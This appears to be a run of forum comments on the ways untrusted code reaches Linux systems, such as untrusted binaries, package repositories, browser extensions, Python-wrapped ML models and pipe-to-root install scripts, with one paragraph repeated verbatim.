Downloading binaries from should-not-be-trusted sources, and executing/installing them is one way. There is some irony on having to do exactly that with this scanner. But, anyway, you may not have everything you want in your distribution, so you may have to resort to that in some cases.
There are more subtler ways to download binaries and scripts from elsewhere, depending on what you use, like Steam games, python/js/perl/etc repositories , browser extensions, adding new distribution repositories, and so on. Everything should be safe enough and should be checked, but as the xz problem showed, that is not a fail-proof guarantee.
Also ML models, which are often distributed not as data (weights), but data wrapped in Python scripts that get to run arbitrary code and download stuff from the Internet.
If you have a public HTTP server somewhere, you can check its access logs. You'll find a lot requests which try to exploit remote code execution vulnerabilities of some CMS or router firmware.
Manually downloaded scripts from websites, which are then run as root. The website will tell you that thats how it works, and to "trust me bro".
The target audience is the same "computer expert" who runs anything he downloads onto his Windows 7 PC as admin, because that solves a lot of issues usuallyâ„¢.
There are more subtler ways to download binaries and scripts from elsewhere, depending on what you use, like Steam games, python/js/perl/etc repositories , browser extensions, adding new distribution repositories, and so on. Everything should be safe enough and should be checked, but as the xz problem showed, that is not a fail-proof guarantee.